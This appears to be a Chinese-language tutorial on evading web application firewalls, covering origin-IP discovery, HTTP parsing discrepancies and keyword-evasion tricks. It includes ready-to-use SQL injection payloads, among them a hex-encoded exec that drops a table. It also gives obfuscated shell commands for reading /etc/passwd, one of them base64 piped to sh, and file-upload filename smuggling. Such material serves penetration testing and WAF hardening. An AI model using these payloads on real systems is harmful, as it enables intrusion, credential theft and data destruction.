本篇文章通过网络架构层、HTTP协议层、第三方应用层讲解了绕过WAF的常见方法
一、网络架构层
一般通过域名指向云WAF地址后反向实现代理,找到这些公司的服务器的真实IP即可实现绕过。
具体方法如下:
1、查找相关的二级域名及同一域名注册者的其他域名解析记录。
2、通过查看邮件MX解析记录来发现真实服务器的IP记录或网段,例如:
windows可以执行命令:
nslookup -qt=mx baidu.com
Linux可以执行如下命令来查看baidu.com域名的MX解析IP地址
dig mx baidu.com
3、查看域名的历史解析记录。实现该操作的网站:
https://securitytrails.com/
4、使用zmap等快速扫描工具对全网IP进行扫描以找到网站真实IP。
5、利用SSRF漏洞反向连接的IP获取网站真实IP。
二、HTTP协议层
可以利用WAF、web server、web语言解析引擎这三方对标准HTTP解析的差异来实现绕过。
具体绕过的方法如下:
1、利用某些硬件WAF对SSL加密算法的支持不够进行绕过。
参考文章:通过滥用SSL / TLS绕过Web应用程序防火墙
对应的测试脚本:abuse-ssl-bypass-waf
2、利用HTTP协议版本来进行绕过
HTTP发展至今,已由1991年的0.9版发展到2015年的2.0版,由于不支持相关协议的WAF在解析数据包时会出问题,因此通过发送不同版本协议的粘包即可绕过某些WAF。
3、利用URL编码、charset编码、MIME编码等进行绕过。
IIS ASP支持类似Unicode %u0027的编码,还会对不合法的URL编码进行字符删除。IIS ASP对s%elect编码的处理结果为select,而Nginx的ngx_unescape_uri函数对它的解码结果为slect。Nginx的ngx_unescape_uri函数在处理%编码时,如果%后面的第一个字符不在十六进制范围内,则会丢弃%;否则判断第二个字符是否在十六进制范围内,如果不在则会丢弃%和第一个字符。
HTTP请求头Content-Type的charset编码可以指定内容编码,这个值一般都是UTF-8编码的,但恶意攻击者可以指定使用ibm037、ibm500、cp875、ibm1026等不常用的编码来进行绕过。例如,可以设置Content-Type头的值为application/x-www-form-urlencoded;charset=ibm500或multipart/form-data;charset=ibm500,boundary=blah等。这里使用Burpsuite的HTTP Request Smuggler插件可以简化数据包的修改操作。
在Spring中,如果上传的文件名以=?开始并以?=结束,则调用MimeDelegate.decode来对文件名解码。MIME是邮件协议中用到的编码方式,这里我们可以将上传文件名改为=?UTF-8?B?YS5qc3A=?=,UTF-8代表字符编码,?B?代表后面的YS5qc3A=是base64编码的。经过Spring解码得到的文件名是a.jsp,而一般的WAF如果之前没有经过处理,那么就会出现在WAF中上传文件名过滤被绕过的问题。
4、利用对上传协议multipart/form-data的不规范解析进行绕过。
以PHP Web Server对multipart/form-data的解析作为例子。
由于该协议对PHP对解析存在缺陷,使得如果一行有多个filename字段值,则PHP Web Server会取最后一个filename值,如下所示:
Content-Disposition: form-data; name="file1"; filename="a.txt"; filename="a.php";
PHP Web Server最终得到的文件名是a.php,而某些WAF只判断第一个filename的值,因此WAF对上传的文件的过滤检测功能会被黑客绕过,并且这里的form-data可有可无,将其去掉也不影响PHP Web Server获取filename。
此外,filename的编码还受HTTP请求Content-Type头中charset的影响,PHP Web Server可以根据这个值进行解码处理。这些都有可能被一些人稍微做点手脚,便可以绕过不少WAF的文件上传过滤检测功能。
5、其他协议的绕过
URI解析绕过:
有些WAF可以处理对URI不兼容的绕过,如:
GET /xxx/a.jsp?x= &id=union%20all%20select%20@@version HTTP/1.1
将HTTP原始数据包的"x="后面设置为空格,某些硬件WAF就会忽略后面的&id=union%20all%20select%20@@version参数从而绕过WAF。
还可以利用一些较少用到的HTTP处理来绕过,例如在HTTP请求body chunked编码时进行注释及变形。
利用HTTP Host头也可以绕过一些基于域名防护的WAF,一般的Host头字符串中不包含端口信息,如":80"或":443",域名也可以用本地Host来代替,可以有如下写法:
Host: localhost:80
Host: 127.0.0.1:80
除此外,基于协议的绕过还有很多,如HPP复参绕过、参数名的特殊字符转换绕过等。
三、第三方应用层
第三方应用层主要有数据库、系统命令、第三方组件等组成部分。下面对这3部分的绕过进行具体说明。
1、数据库的绕过
数据库的绕过方式极多,有注释绕过、编码绕过、不同数据库对空格的不同定义绕过等。
利用MySQL的版本号注释(/*!)功能绕过WAF的情况最多,还有一些方法也可以绕过WAF,比如,利用0xA0代替空格也能绕过一些WAF,利用\N和.e浮点等特殊用法绕过WAF(绕过一些如union的关键字),以及利用&&代替and等关键字和大括号注释(如union select{x 1},xx)绕过WAF等。
在MySQL中,从0x01至0x0F的字符都可以代表空格。通过注释加换行也可以绕过一些WAF过滤,比如,1%23%0AAND%23%0A1=1(%23经过URL解码后是#字符,#字符是MySQL中的注释符,%0A经过URL解码后是换行符);还有利用"."和":"特殊符号进行绕过的,如:
union select xx from.table
union select:top 1 from
and:xx
另外,利用exec编码也可以绕过关键字,如:
and 1=0;declare @S varchar(4000) set @S=cast(0x44524f50205441424c4520544d505f44423b as varchar(4000));exec(@S);--
更多有关数据库的绕过可以参考sqlmap的temper插件,插件地址为:https://github.com/sqlmapproject/sqlmap/tree/master/tamper
2、系统命令的绕过
以cat /etc/passwd命令为例,在Linux bash环境下去掉空格的写法如下:
cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
以ping baidu.com为例,在windows中替换空格的写法如下:
ping%CommonProgramFiles:~10,-18%baidu.com
ping%PROGRAMFILES:~10,-5%baidu.com
在Linux的bash环境下想要绕过关键字,则可以插入成对的单引号、双引号或反引号,其中反引号必须连着写,比如可以将cat /etc/passwd写为以下形式:
c'a't /etc/pass''wd
c""at /e't'c/pass""wd
c""at /e't'c/pas``s``wd
另外,也可以在shell命令的任意位置插入$@,或者在单词结尾处插入$x,这里的x可以是任意字母,例如可以写成如下形式:
c$@at /e$@tc/pas$@swd
cat$x /etc$x/passwd$x
ca$@t /etc$x/passwd$x
若通过编码绕过关键字,则可以将cat /etc/passwd进行base64编码,写法如下:
echo Y2F0IC9ldGMvcGFzc3dk|base64 -d|sh
若通过通配符绕过关键字,则linux bash的通配符与windows的类似,支持使用?代表单个字符和使用*代表多个字符的写法,如/bin/cat /etc/passwd命令可以有以下写法:
/b??/ca? /e?c/pas?wd
/b*/ca* /et*/pas*d
/b??/ca* /e?c/pas*d
除此之外,还可以通过一些脚本执行引擎,如perl、python、nodejs、php、java等来绕过WAF关键字,相关写法如下:
perl -e '$a="ca";$b="t /et";$c="c/pas";exec($a.$b.$c."swd");'
python -c 'import subprocess;subprocess.call(["ca"+"t","/et"+"c/pa"+"sswd"]);'
php -r 'exec("ca"."t /et"."c/pa"."sswd");'
3、第三方组件的绕过
一般来说,WAF会用到的第三方组件有PCRE、ISAPI、Libinjection等。
PCRE在处理正则表达式时,为了防止ReDoS正则表达式拒绝服务攻击,提供了PCRE_EXTRA_MATCH_LIMIT和PCRE_EXTRA_MATCH_LIMIT_RECURSION选项来限制匹配次数。PCRE_EXTRA_MATCH_LIMIT的值默认为100万,PCRE_EXTRA_MATCH_LIMIT可以限制匹配的总次数;而PCRE_EXTRA_MATCH_LIMIT_RECURSION主要限制匹配递归次数,并不是所有匹配都存在递归,所以该值在小于PCRE_EXTRA_MATCH_LIMIT值时才有意义。
有些WAF为了防止ReDoS都会将PCRE_EXTRA_MATCH_LIMIT设置为比默认值更小的值,加入将WAF过滤SQL语句的正则表达式写成:
/UNION.+?SELECT/is
而此时PCRE_EXTRA_MATCH_LIMIT的值为100万,那么要绕过WAF过滤防护的SQL语句可以写成:
union/*aaa……a*/select
这里被注释掉的字符a有100万个,很容易满足PCRE_EXTRA_MATCH_LIMIT的值为100万的限制条件,而且这些字符的数据量大小不到1MB,不会占用太多空间。根据此方法可以绕过很多类似的WAF正则规则。
ISAPI是IIS提供的一套编写API的插件,ISAPI filter可以对请求头中的数据进行过滤,ISAPI extension可以获取请求的body数据,对应的原型为HttpExtensionProc(EXTENSION_CONTROL_BLOCK*pECB)。这里可以通过pECB->lpbData获取到post请求的body部分的数据,但最大只能存储48kb的数据。总的大小可以通过pECB->cbTotalBytes获取,超过48kb的数据的同步函数调用方式可以通过pECB->ReadClient(...)获取,异步函数调用方式可以通过pECB->ServerSupportFunction(...,HSE_REQ_ASYNC_READ_CLIENT,...)获取。
但是,这样在ISAPI插件的WAF中读取超过48kb的数据会导致后面的ASP获取不了多于48kb的数据,因此很多基于ISAPI的IIS WAF都可以通过把攻击数据放到48kb外而绕过WAF防护。如果某post参数id存在SQL注入,那么我们可以填充48kb的无用数据后再写注入语句,如下所示:
x=aaa...a&id=1%20union%20all%20select%201,1,1,1@@version,1
其中,上面的a字符所占用的空间超过了48kb
Libinjection被应用于很多WAF中,知名的有modsecurity。因为Libinjection只是对SQL语句进行标签化(token化),然后对被标签化的字符串进行匹配,所以同一种绕过方法通常可以绕过很多SQL注入语句的过滤规则。
利用不常用的SQL函数可以绕过Libinjection过滤,比如用mod(3,2)代替1的SQL语句可以写为:
mod(3,2) union select mod(3,2),usr,pwd from user --
通过使用Fuzz测试技术也可以绕过Libinjection过滤,例如插入1<@到SQL语句中可以绕过Libinjection防护,此方法也可以绕过某些WAF的SQL注入语义检测引擎。相关的Python脚本地址为:https://waf.ninja/libinjection-fuzz-to-bypass/
通过大括号也可以绕过Libinjection过滤,MySQL支持{identifier expr}这种兼容ODBC的转义写法,对应的可绕过Libinjection过滤的SQL语句如下所示:
1'<@=1 or {x (select 1)} --
1 and{`if`updatexml (1,concat (0x3a,(select /*!50000(/*!50000schema_name) from/*!50000information_schema*/.schemata limit 0,1)),1)} --
四、总结
总的来说,在WAF上只要善于挖掘,总能找出各式各样的绕过方法。
